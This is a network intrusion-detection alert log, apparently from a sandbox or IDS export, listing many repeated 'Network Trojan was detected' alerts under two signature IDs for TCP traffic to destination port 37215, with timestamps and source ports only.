                  Timestamp:07/10/24-08:27:07.272615
                  SID:2835222
                  Source Port:44912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.014699
                  SID:2835222
                  Source Port:49774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253798
                  SID:2835222
                  Source Port:43660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.859810
                  SID:2835222
                  Source Port:58680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.444805
                  SID:2835222
                  Source Port:37874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.848557
                  SID:2829579
                  Source Port:53856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603771
                  SID:2835222
                  Source Port:53242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.846254
                  SID:2829579
                  Source Port:50046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.545606
                  SID:2829579
                  Source Port:44270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.706430
                  SID:2829579
                  Source Port:33484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.761742
                  SID:2835222
                  Source Port:39182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.337852
                  SID:2829579
                  Source Port:53734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.260181
                  SID:2829579
                  Source Port:44916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.929800
                  SID:2835222
                  Source Port:38174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207005
                  SID:2835222
                  Source Port:59282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2829579
                  Source Port:41918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.658407
                  SID:2829579
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002361
                  SID:2829579
                  Source Port:40982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.781993
                  SID:2829579
                  Source Port:34866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.874012
                  SID:2835222
                  Source Port:45734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655011
                  SID:2835222
                  Source Port:44724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858184
                  SID:2835222
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.545900
                  SID:2829579
                  Source Port:36484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.988456
                  SID:2835222
                  Source Port:60410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2835222
                  Source Port:60808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328619
                  SID:2829579
                  Source Port:40550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.989699
                  SID:2829579
                  Source Port:44050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881879
                  SID:2835222
                  Source Port:45676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517313
                  SID:2835222
                  Source Port:56200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051351
                  SID:2835222
                  Source Port:44168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.795103
                  SID:2835222
                  Source Port:35982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.100122
                  SID:2835222
                  Source Port:54578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.851748
                  SID:2835222
                  Source Port:33138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2829579
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.544401
                  SID:2829579
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.403967
                  SID:2835222
                  Source Port:54262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.155297
                  SID:2829579
                  Source Port:40850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.524637
                  SID:2829579
                  Source Port:41788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863790
                  SID:2829579
                  Source Port:44036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047599
                  SID:2829579
                  Source Port:36876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863790
                  SID:2835222
                  Source Port:51480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602749
                  SID:2835222
                  Source Port:58180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.675135
                  SID:2835222
                  Source Port:58472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822403
                  SID:2829579
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109187
                  SID:2829579
                  Source Port:42222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022558
                  SID:2835222
                  Source Port:35166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.876490
                  SID:2829579
                  Source Port:49844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873378
                  SID:2829579
                  Source Port:34678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.598533
                  SID:2829579
                  Source Port:56034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.863444
                  SID:2829579
                  Source Port:32852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.191107
                  SID:2835222
                  Source Port:51144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739148
                  SID:2835222
                  Source Port:52038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.441344
                  SID:2835222
                  Source Port:33552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814365
                  SID:2835222
                  Source Port:47248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.279073
                  SID:2835222
                  Source Port:52296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.836593
                  SID:2835222
                  Source Port:45362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.650487
                  SID:2829579
                  Source Port:42108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.665710
                  SID:2829579
                  Source Port:47094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.549542
                  SID:2835222
                  Source Port:59718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:38224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.319279
                  SID:2829579
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848074
                  SID:2829579
                  Source Port:43778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.801694
                  SID:2835222
                  Source Port:46900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.205775
                  SID:2835222
                  Source Port:49048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2835222
                  Source Port:59550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.665710
                  SID:2835222
                  Source Port:54418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.655594
                  SID:2835222
                  Source Port:52404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819719
                  SID:2835222
                  Source Port:56680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243184
                  SID:2829579
                  Source Port:46250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915604
                  SID:2835222
                  Source Port:45814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2835222
                  Source Port:52568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865021
                  SID:2829579
                  Source Port:52056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.619310
                  SID:2835222
                  Source Port:36704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468804
                  SID:2829579
                  Source Port:51932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.873072
                  SID:2835222
                  Source Port:52186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589238
                  SID:2829579
                  Source Port:43338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.951941
                  SID:2829579
                  Source Port:42346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.890469
                  SID:2829579
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.008674
                  SID:2829579
                  Source Port:49092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2835222
                  Source Port:53690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.510075
                  SID:2829579
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.625044
                  SID:2829579
                  Source Port:47444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.843538
                  SID:2829579
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.486593
                  SID:2829579
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.824141
                  SID:2835222
                  Source Port:50512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.214237
                  SID:2829579
                  Source Port:60114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.242541
                  SID:2835222
                  Source Port:57378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161907
                  SID:2829579
                  Source Port:35890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.042445
                  SID:2835222
                  Source Port:55728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735406
                  SID:2835222
                  Source Port:60894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.882577
                  SID:2829579
                  Source Port:36426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.326882
                  SID:2835222
                  Source Port:43844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.498788
                  SID:2829579
                  Source Port:40882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.160921
                  SID:2835222
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356942
                  SID:2835222
                  Source Port:45044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271141
                  SID:2835222
                  Source Port:35100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.037647
                  SID:2835222
                  Source Port:57182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763901
                  SID:2829579
                  Source Port:59682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257964
                  SID:2835222
                  Source Port:40922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.556012
                  SID:2835222
                  Source Port:33122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.554861
                  SID:2835222
                  Source Port:49738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.821696
                  SID:2829579
                  Source Port:58432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815907
                  SID:2829579
                  Source Port:42788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.100674
                  SID:2829579
                  Source Port:54802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187886
                  SID:2829579
                  Source Port:46970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152371
                  SID:2829579
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339944
                  SID:2835222
                  Source Port:55198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936366
                  SID:2829579
                  Source Port:35472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.807030
                  SID:2835222
                  Source Port:43886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156857
                  SID:2829579
                  Source Port:36010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.426647
                  SID:2835222
                  Source Port:50068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171488
                  SID:2829579
                  Source Port:37896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2829579
                  Source Port:50900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.519262
                  SID:2829579
                  Source Port:59704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353593
                  SID:2835222
                  Source Port:45170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.664529
                  SID:2829579
                  Source Port:35500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2829579
                  Source Port:51196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956577
                  SID:2835222
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.893845
                  SID:2835222
                  Source Port:41972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.841622
                  SID:2829579
                  Source Port:38860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511360
                  SID:2835222
                  Source Port:40180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.506154
                  SID:2829579
                  Source Port:35216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.654504
                  SID:2829579
                  Source Port:38758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828801
                  SID:2835222
                  Source Port:41168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483637
                  SID:2835222
                  Source Port:32814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.882178
                  SID:2835222
                  Source Port:56776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.434490
                  SID:2829579
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060126
                  SID:2829579
                  Source Port:39218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063011
                  SID:2829579
                  Source Port:48618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126128
                  SID:2835222
                  Source Port:38264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.003897
                  SID:2829579
                  Source Port:41560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348137
                  SID:2829579
                  Source Port:35480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861984
                  SID:2829579
                  Source Port:39510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.834521
                  SID:2829579
                  Source Port:33966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359081
                  SID:2829579
                  Source Port:45020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.876848
                  SID:2829579
                  Source Port:43184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.054333
                  SID:2835222
                  Source Port:40510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.173254
                  SID:2835222
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.439490
                  SID:2829579
                  Source Port:43170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.923569
                  SID:2835222
                  Source Port:44430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663934
                  SID:2835222
                  Source Port:59330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145765
                  SID:2829579
                  Source Port:57270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.666917
                  SID:2829579
                  Source Port:37094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115496
                  SID:2835222
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488786
                  SID:2829579
                  Source Port:53978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.866007
                  SID:2829579
                  Source Port:52520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.397697
                  SID:2835222
                  Source Port:36692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735455
                  SID:2835222
                  Source Port:39108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378488
                  SID:2829579
                  Source Port:55704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.511212
                  SID:2835222
                  Source Port:39596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.496720
                  SID:2835222
                  Source Port:45934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2829579
                  Source Port:33164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.790586
                  SID:2829579
                  Source Port:59214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.962556
                  SID:2829579
                  Source Port:40114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.407237
                  SID:2829579
                  Source Port:57348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983533
                  SID:2829579
                  Source Port:58912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489272
                  SID:2835222
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.432344
                  SID:2829579
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481088
                  SID:2835222
                  Source Port:34094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.426359
                  SID:2829579
                  Source Port:45462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128413
                  SID:2835222
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058736
                  SID:2835222
                  Source Port:40798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430323
                  SID:2835222
                  Source Port:50012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.003131
                  SID:2829579
                  Source Port:36922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.048424
                  SID:2829579
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.900860
                  SID:2835222
                  Source Port:60512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2829579
                  Source Port:54426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2835222
                  Source Port:48948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281548
                  SID:2829579
                  Source Port:38162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.761554
                  SID:2829579
                  Source Port:33158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024075
                  SID:2835222
                  Source Port:58494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.255405
                  SID:2829579
                  Source Port:49018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.465433
                  SID:2835222
                  Source Port:53632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.455188
                  SID:2829579
                  Source Port:39522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.840252
                  SID:2829579
                  Source Port:49002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.951941
                  SID:2835222
                  Source Port:47994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245550
                  SID:2829579
                  Source Port:46414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.199033
                  SID:2835222
                  Source Port:41644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.768994
                  SID:2835222
                  Source Port:55992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572202
                  SID:2829579
                  Source Port:53066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873302
                  SID:2829579
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624834
                  SID:2829579
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.207686
                  SID:2829579
                  Source Port:33040
                  Destination Port:37215
                  Protocol:TCP
